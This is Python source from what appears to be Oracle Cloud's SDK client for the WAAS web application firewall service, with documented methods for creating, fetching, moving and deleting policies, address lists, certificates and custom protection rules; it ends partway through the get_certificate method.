def change_waas_policy_compartment(self, waas_policy_id, change_waas_policy_compartment_details, **kwargs):
    """
    Moves WAAS policy into a different compartment. When provided, If-Match is checked against ETag values of the WAAS policy.
    For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.

    __ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.ChangeWaasPolicyCompartmentDetails change_waas_policy_compartment_details: (required)

    :param str if_match: (optional)
        For optimistic concurrency control. Set to the etag value from a previous `GET` or `POST` response; the resource is updated or deleted only when that etag matches its current etag.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_waas_policy_compartment.py.html>`__ to see an example of how to use change_waas_policy_compartment API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/actions/changeCompartment"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "if_match",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "change_waas_policy_compartment got unknown kwargs: {!r}".format(unrecognized))

    # Collect path parameters; each must be a non-empty, non-whitespace value.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {
        name: value
        for (name, value) in six.iteritems(path_params)
        if value is not missing
    }
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and not value.strip()
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=change_waas_policy_compartment_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_waas_policy_compartment_details)
def create_address_list(self, create_address_list_details, **kwargs):
    """
    Creates an address list in a set compartment and allows it to be used in a WAAS policy and referenced by access rules. Addresses can be IP addresses and CIDR notations.

    :param oci.waas.models.CreateAddressListDetails create_address_list_details: (required)
        The details of the address list resource to create.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_address_list.py.html>`__ to see an example of how to use create_address_list API.
    """
    resource_path = "/addressLists"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "create_address_list got unknown kwargs: {!r}".format(unrecognized))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=create_address_list_details,
            response_type="AddressList")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_address_list_details,
        response_type="AddressList")
def create_certificate(self, create_certificate_details, **kwargs):
    """
    Allows an SSL certificate to be added to a WAAS policy. The Web Application Firewall terminates SSL connections to inspect requests in runtime, and then re-encrypts requests before sending them to the origin for fulfillment.

    For more information, see `WAF Settings`__.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafsettings.htm

    :param oci.waas.models.CreateCertificateDetails create_certificate_details: (required)
        The details of the SSL certificate resource to create.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_certificate.py.html>`__ to see an example of how to use create_certificate API.
    """
    resource_path = "/certificates"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "create_certificate got unknown kwargs: {!r}".format(unrecognized))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=create_certificate_details,
            response_type="Certificate")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_certificate_details,
        response_type="Certificate")
def create_custom_protection_rule(self, create_custom_protection_rule_details, **kwargs):
    """
    Creates a new custom protection rule in the specified compartment.

    Custom protection rules let you add rules on top of the rulesets provided by the
    Web Application Firewall service, including rules from `ModSecurity`__. The syntax
    for custom rules is based on ModSecurity syntax; see `Custom Protection Rules`__
    for details.

    __ https://modsecurity.org/
    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/customprotectionrules.htm

    :param oci.waas.models.CreateCustomProtectionRuleDetails create_custom_protection_rule_details: (required)
        The details of the custom protection rule.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error without re-executing the action. Retry tokens expire
        after 24 hours but may be invalidated sooner by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
    :rtype: :class:`~oci.response.Response`
    """
    path = "/customProtectionRules"
    http_method = "POST"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "create_custom_protection_rule got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Both dispatch paths share the same call arguments; header_params mutations
    # below remain visible because the same dict object is referenced here.
    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "header_params": header_params,
        "body": create_custom_protection_rule_details,
        "response_type": "CustomProtectionRule"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def create_waas_policy(self, create_waas_policy_details, **kwargs):
    """
    Creates a new Web Application Acceleration and Security (WAAS) policy in the
    specified compartment.

    A WAAS policy must exist before Web Application Firewall (WAF) rules can be
    created; your web application's origin servers must be defined in the `WaasPolicy`
    schema to use WAF rules. A domain name must be specified when creating the policy,
    must differ from every origin in the `WaasPolicy`, and cannot be changed once
    stored. Use the record data returned in the `cname` field of the `WaasPolicy`
    object to create a CNAME record in your DNS configuration that directs your
    domain's traffic through the WAF.

    For access control you must provide the OCID of the compartment where the service
    should reside; see `Overview of the IAM Service`__. A display name (not required
    to be unique, and changeable) and domain are required. Every Oracle Cloud
    Infrastructure resource, including a WAAS policy, receives an Oracle Cloud
    Identifier (OCID), returned in the response and retrievable via list operations or
    the Console; see `Resource Identifiers`__.

    **Note:** After the POST request the new object's state is temporarily `CREATING`.
    Ensure the state has changed to `ACTIVE` before use.

    __ https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm
    __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.CreateWaasPolicyDetails create_waas_policy_details: (required)
        The details of the WAAS policy.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error. Retry tokens expire after 24 hours but may be
        invalidated sooner by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    path = "/waasPolicies"
    http_method = "POST"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "create_waas_policy got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # No response_type: the service returns no deserializable body for this call.
    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "header_params": header_params,
        "body": create_waas_policy_details
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_address_list(self, address_list_id, **kwargs):
    """
    Deletes the address list from the compartment if it is not used.

    :param str address_list_id: (required)
        The `OCID`__ of the address list. This number is generated when the address
        list is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error. Retry tokens expire after 24 hours but may be
        invalidated sooner by conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous `GET` or
        `POST` response for this resource. The delete proceeds only if the etag
        matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    path = "/addressLists/{addressListId}"
    http_method = "DELETE"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "delete_address_list got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "addressListId": address_list_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params)
                   if value is not missing}
    # Every remaining path parameter must be a non-blank value.
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "path_params": path_params,
        "header_params": header_params
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_certificate(self, certificate_id, **kwargs):
    """
    Deletes an SSL certificate from the WAAS service.

    :param str certificate_id: (required)
        The `OCID`__ of the SSL certificate used in the WAAS policy. This number is
        generated when the certificate is added to the policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error. Retry tokens expire after 24 hours but may be
        invalidated sooner by conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous `GET` or
        `POST` response for this resource. The delete proceeds only if the etag
        matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    path = "/certificates/{certificateId}"
    http_method = "DELETE"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "delete_certificate got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "certificateId": certificate_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params)
                   if value is not missing}
    # Every remaining path parameter must be a non-blank value.
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "path_params": path_params,
        "header_params": header_params
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_custom_protection_rule(self, custom_protection_rule_id, **kwargs):
    """
    Deletes a Custom Protection rule.

    :param str custom_protection_rule_id: (required)
        The `OCID`__ of the custom protection rule. This number is generated when the
        custom protection rule is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error. Retry tokens expire after 24 hours but may be
        invalidated sooner by conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous `GET` or
        `POST` response for this resource. The delete proceeds only if the etag
        matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    path = "/customProtectionRules/{customProtectionRuleId}"
    http_method = "DELETE"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "delete_custom_protection_rule got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "customProtectionRuleId": custom_protection_rule_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params)
                   if value is not missing}
    # Every remaining path parameter must be a non-blank value.
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "path_params": path_params,
        "header_params": header_params
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_waas_policy(self, waas_policy_id, **kwargs):
    """
    Deletes a policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param str opc_retry_token: (optional)
        A token uniquely identifying the request so it can be retried safely after a
        timeout or server error. Retry tokens expire after 24 hours but may be
        invalidated sooner by conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous `GET` or
        `POST` response for this resource. The delete proceeds only if the etag
        matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    path = "/waasPolicies/{waasPolicyId}"
    http_method = "DELETE"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "delete_waas_policy got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params)
                   if value is not missing}
    # Every remaining path parameter must be a non-blank value.
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "path_params": path_params,
        "header_params": header_params
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_address_list(self, address_list_id, **kwargs):
    """
    Gets the details of an address list.

    :param str address_list_id: (required)
        The `OCID`__ of the address list. This number is generated when the address
        list is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; provide it when contacting Oracle
        about this particular request.

    :param obj retry_strategy: (optional)
        A retry strategy applied to this call only, overriding any client-level
        strategy. Use one of the strategies in the :py:mod:`~oci.retry` module; pass an
        instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable
        retries. This operation does not retry by default.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response body
        (disallowed by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
    :rtype: :class:`~oci.response.Response`
    """
    path = "/addressLists/{addressListId}"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    accepted_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "get_address_list got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "addressListId": address_list_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params)
                   if value is not missing}
    # Every remaining path parameter must be a non-blank value.
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop any header the caller did not actually supply.
    header_params = {name: value for (name, value) in six.iteritems(header_params)
                     if value is not missing and value is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = {
        "resource_path": path,
        "method": http_method,
        "path_params": path_params,
        "header_params": header_params,
        "response_type": "AddressList"
    }
    if retry_strategy:
        # GET is idempotent: no retry token is added, only the retries header.
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_certificate(self, certificate_id, **kwargs):
    """
    Gets the details of an SSL certificate.

    :param str certificate_id: (required)
        The `OCID`__ of the SSL certificate used in the WAAS policy. This number is
        generated when the certificate is added to the policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/certificates/{certificateId}"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_certificate got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "certificateId": certificate_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
